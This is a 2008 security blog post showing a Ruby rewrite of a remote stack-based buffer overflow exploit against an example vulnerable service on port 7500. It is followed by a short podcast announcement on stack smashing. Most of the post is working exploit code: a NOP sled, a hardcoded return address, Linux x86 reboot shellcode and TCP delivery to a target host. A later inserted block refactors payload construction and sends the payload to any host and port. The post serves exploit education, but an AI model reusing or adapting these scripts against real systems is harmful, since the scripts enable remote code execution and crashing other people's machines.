
Remote Exploit Development in Ruby

February 13th, 2008 Anthony Towry

This Friday we are getting back into the trenches at the DC405. We have a talk coming up on remote exploitation of stack-based overflows that will be presented by ri0t.

So, I've been checking out the write-up by Preddy regarding the service. It's a nice walk-through on exploiting an example vulnerable service using both C and Perl. It's informative; I had to adjust my payload size (no biggie) and add a #include <string.h>, but overall it's a solid example without errors.

Exploits written in C are fairly common. Exploits written in Perl aren't rare. Exploits written in Ruby are like unicorns: they probably exist, but you never see one (at least not where I keep up with them). At any rate, I decided to look into rewriting the example exploit in Ruby and scratching the surface of Ruby sockets. It turns out that this is an extremely simple thing to do.

 
#!/usr/bin/ruby
# http://www.calculateddecision.com

require 'socket'

port   = 7500
victim = ARGV[0]

nop  = "\x90"
sled = nop * 240

# Guessed return address, pointing into the NOP sled (0xbffff9a8, little-endian).
# This will probably be different for you.
eip = "\xa8\xf9\xff\xbf"

# 20 byte reboot shellcode, Linux x86. Thanks to izik <izik@tty64.org>
shellcode = "\x6a\x58" +              # push 0x58 ; pop eax -> eax = 88 (sys_reboot)
            "\x58" +
            "\xbb\xad\xde\xe1\xfe" +  # mov ebx, 0xfee1dead (LINUX_REBOOT_MAGIC1)
            "\xb9\x69\x19\x12\x28" +  # mov ecx, 0x28121969 (LINUX_REBOOT_MAGIC2)
            "\xba\x67\x45\x23\x01" +  # mov edx, 0x01234567 (LINUX_REBOOT_CMD_RESTART)
            "\xcd\x80"                # int 0x80

# sled (240) + shellcode (20) + eip (4) = 264 bytes
payload = sled + shellcode + eip

if ARGV.length < 1  # Brief usage
  puts "You have to give me a target"
else
  mysocket = TCPSocket.new(victim, port)
  mysocket.send(payload, 0)
  mysocket.close
end

As you can see, the TCPSocket constructor only needs a host and a port. What's nice is that you can hand it a domain name and it resolves it for you. I half wondered whether the hex bytes would need to be encoded or escaped somehow, but that is also handled for us: the string goes out on the socket byte for byte. One caveat worth knowing: send returns the number of bytes actually handed to the kernel, which for a 264-byte payload on a blocking socket will be all of them, but for anything larger write is the safer call because it loops until the whole buffer is out.
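The same payload construction and delivery, written out as an added example (this is not the post's code, nor Preddy's): it packs the return address with Array#pack('V') instead of a hand-typed byte string, checks that sled, shellcode and return address fit the 264-byte budget the post uses, checks that a guessed return address actually lands inside the sled, and sends with write. REBOOT_SHELLCODE is the same 20 bytes as above. The loopback server, the 264-byte budget and the buffer base address 0xbffff900 used in the demo run are assumptions for illustration, not values from the post.

```ruby
require 'socket'

# The post's 20-byte Linux x86 reboot shellcode (izik), as one binary string:
# push 0x58 / pop eax (sys_reboot), mov ebx,0xfee1dead, mov ecx,0x28121969,
# mov edx,0x01234567 (LINUX_REBOOT_CMD_RESTART), int 0x80
REBOOT_SHELLCODE =
  "\x6a\x58\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80".b

# Build sled + shellcode + return address, sizing the sled so the whole
# payload is exactly total_len bytes (264 in the post: 240 + 20 + 4).
def build_payload(ret_addr, shellcode, total_len, nop: "\x90".b)
  shellcode = shellcode.b                       # force raw bytes, never re-encode
  sled_len  = total_len - shellcode.bytesize - 4
  raise ArgumentError, "budget of #{total_len} bytes is too small" if sled_len < 0
  ret = [ret_addr].pack('V')                    # 32-bit little-endian, x86 stack order
  nop * sled_len + shellcode + ret
end

# The guessed return address only helps if it points somewhere inside the sled.
# buffer_base is the address of the vulnerable buffer on the target (assumed here;
# in practice you read it out of gdb).
def lands_in_sled?(ret_addr, buffer_base, sled_len)
  ret_addr >= buffer_base && ret_addr < buffer_base + sled_len
end

# Deliver the payload. TCPSocket resolves names for us; write() loops until
# every byte is out, whereas send() may return early with a partial count.
def deliver(host, port, payload)
  sock = TCPSocket.new(host, port)
  sent = sock.write(payload)
  sock.close
  sent
end

# Offline check of the wire format: a throwaway TCP server on 127.0.0.1 receives
# what deliver() sends and hands the raw bytes back for comparison.
def loopback_roundtrip(payload)
  server = TCPServer.new('127.0.0.1', 0)        # port 0: let the kernel pick one
  port = server.addr[1]
  receiver = Thread.new do
    client = server.accept
    data = client.read                          # reads to EOF; deliver() closes
    client.close
    data
  end
  deliver('127.0.0.1', port, payload)
  received = receiver.value
  server.close
  received
end

if $PROGRAM_NAME == __FILE__
  payload = build_payload(0xbffff9a8, REBOOT_SHELLCODE, 264)
  puts "payload: #{payload.bytesize} bytes, ret lands in sled: " \
       "#{lands_in_sled?(0xbffff9a8, 0xbffff900, 240)}"   # 0xbffff900 is assumed
  echoed = loopback_roundtrip(payload)
  puts "loopback received #{echoed.bytesize} bytes, identical: #{echoed == payload}"
  deliver(ARGV[0], ARGV[1].to_i, payload) if ARGV.length == 2
end
```

Run with no arguments it only does the loopback round trip; given a host and port it also delivers the payload to that target. Keeping the return address as an integer and packing it at the last moment is the habit worth taking away: it makes the little-endian byte order a property of pack('V') rather than something you get right by hand each time.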

Looking at Preddy's Perl example, the two forms don't really differ all that much, and in fact I'm not entirely sure there isn't a simpler socket constructor available in Perl (if nothing else, on CPAN). Even so, Ruby does, IMHO, offer a more inviting grammar.

You can download my send_overflow.rb here.

Notes:
xWinGs wrote a local ENV variable example

Posted in Programming, Security

Getting to Know Stack Smashing

February 6th, 2008 Anthony Towry

In this episode of The Decision, I cover some of the issues that people run into as they start experimenting and exploring stack-based buffer overflows on Linux. Stack smashing is an interesting and rewarding exercise for security enthusiasts. It perfectly illustrates the idea of what can go wrong when trusting user input.

Hopefully, with a handful of tips on the "gotchas", we can make it a bit less frustrating at the start.

 
Podcast: Issues With Stack Smashing (36:03)

Posted in Podcast
